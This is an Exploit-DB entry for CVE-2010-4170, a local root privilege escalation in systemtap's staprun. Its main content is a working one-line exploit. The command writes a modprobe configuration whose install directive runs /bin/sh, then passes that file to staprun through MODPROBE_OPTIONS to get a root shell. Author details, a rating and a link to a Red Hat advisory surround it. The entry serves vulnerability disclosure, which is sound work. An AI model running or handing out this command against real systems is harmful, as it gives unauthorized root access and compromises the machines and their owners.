systemtap - Local Root Privilege Escalation Vulnerability



EDB-ID: 15620 CVE: 2010-4170 OSVDB-ID: 69489
Author: Tavis Ormandy Published: 2010-11-26 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(5.0)
Screenshot
Prev Home Next
CVE-2010-4170

printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever


RHEL Advisory:
https://rhn.redhat.com/errata/RHSA-2010-0894.html